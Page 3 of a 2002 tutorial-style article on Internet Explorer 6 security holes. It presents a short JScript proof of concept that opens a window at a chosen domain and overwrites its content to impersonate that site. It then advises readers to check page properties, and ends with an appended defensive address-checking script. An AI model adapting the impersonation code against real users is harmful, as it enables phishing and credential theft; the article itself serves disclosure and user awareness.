Internet Explorer 6 Hacks And Holes Exposed


Apparently Microsoft were in a little bit of a rush to get Internet Explorer 6 out the door, and forgot to take that extra bit of time to debug and test it for security cracks and holes. In this article Mitchell talks about the latest security holes found in IE6. He shows you how to test your system for vulnerabilities and also provides links to the relevant patches and more information on the holes.

Author Info:
By: Mitchell Harper
February 14, 2002
TABLE OF CONTENTS:
  1. Internet Explorer 6 Hacks And Holes Exposed
  2. Mmmmm... gimme cookie!
  3. Site Impersonation: Mixed Identities
  4. Direct file access
  5. Conclusion

Internet Explorer 6 Hacks And Holes Exposed - Site Impersonation: Mixed Identities
(Page 3 of 5)

If you open a new web browser window using JScript in IE6 with something like "http://www.company.com" as the URL, then you'd be pretty sure that the page you're viewing actually comes from that domain, right? It's impossible to change the contents of a web page on another domain, isn't it? Are you sure? Absolutely sure? Thought not.

That's right folks, using just a couple of lines of JScript, you can open a new browser window containing the URL of an external site and modify the body of that page, a.k.a. site impersonation.

Create a new page named c:\site_impersonate.html and enter the following code into it:

<html>
<head>
<title> Site Impersonation </title>
<script language="JavaScript">
<!--
function openWin()
{
    url = prompt("Enter a fully qualified domain name:");
    win = document.open(url, "urlWin", "top=200, left=200, width=300, height=250, resizable=yes, location=yes, status=yes, toolbar=yes");
    win.document.write("You entered the domain name of " + url + ", but I'd rather you see this:<br><br><h1>Hello World!</h1>");
}
-->
</script>
</head>
<body bgcolor="#FFFFFF" onLoad="openWin()">
</body>
</html>


Load the page up in IE6 and enter a fully qualified domain name in the popup window (I entered the name of my site, http://www.devarticles.com). Look at what happens when the JScript code opens a new window:

Site impersonation at its best!

Once again, think of all the scenarios where this could threaten your personal security. Next time you click on a link to pay for a credit card purchase and it opens in another window, be 500% sure that the site is who it says it is. To do this, right-click in the middle of the page and click the Properties option. Make sure the address of the site is actually http://www.payment-gateway.com or whatever the URL of the payment provider is. Here are the properties of the page that we just impersonated:

The properties page of the impersonated site

See how the address points to the script that opened the new window? If you're using IE6, always check the address of a page if you're about to enter sensitive information such as your address, phone number, credit card details, etc.
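
The address check described above, written out as an added example (not code from the original article): it compares the address a window reports under Properties with the site you expected, and rejects non-web addresses and lookalike hosts. The function names and the evil.example addresses are hypothetical; http://www.payment-gateway.com is the article's own placeholder.

```javascript
// Added example: compare the address a window actually reports (what
// IE6 shows under Properties) with the origin the user expected.
// All sample addresses used with it are constructed for illustration.

const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Reduce an address to scheme, host and port, or return null when the
// address is not a web origin at all (file:, about:, javascript:, ...).
function webOrigin(address) {
  let u;
  try {
    u = new URL(address);
  } catch (e) {
    return null; // unparseable address
  }
  if (!(u.protocol in DEFAULT_PORTS)) return null;
  return {
    scheme: u.protocol,
    host: u.hostname.toLowerCase(),
    // An omitted port means the scheme's default port.
    port: u.port || DEFAULT_PORTS[u.protocol],
  };
}

// Returns { ok, reason } describing whether the reported address
// belongs to the expected site. Userinfo tricks such as
// "http://expected-host@other-host/" resolve to other-host here.
function checkAddress(reportedAddress, expectedSite) {
  const want = webOrigin(expectedSite);
  if (!want) return { ok: false, reason: "expected site is not an http(s) URL" };
  const got = webOrigin(reportedAddress);
  if (!got) return { ok: false, reason: "address is not an http(s) URL" };
  if (got.host !== want.host) return { ok: false, reason: "host mismatch: " + got.host };
  if (got.scheme !== want.scheme) return { ok: false, reason: "scheme mismatch" };
  if (got.port !== want.port) return { ok: false, reason: "port mismatch" };
  return { ok: true, reason: "same origin" };
}
```

For the impersonated window in this article, the reported address is the local script (file:///c:/site_impersonate.html), so the check fails with "address is not an http(s) URL".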